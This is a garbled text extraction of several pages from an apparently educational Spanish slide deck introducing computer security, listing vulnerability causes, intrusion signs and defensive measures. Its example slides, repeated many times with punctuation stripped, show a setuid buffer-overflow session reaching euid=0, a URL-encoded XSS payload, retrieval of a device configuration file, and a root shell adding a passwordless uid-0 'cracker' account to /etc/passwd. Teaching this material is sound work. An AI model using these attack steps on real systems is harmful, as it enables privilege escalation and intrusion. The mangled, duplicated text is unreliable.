$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 32: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 33: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 34: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 35: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 36: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 37: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 38: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 39: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 40: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 41: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores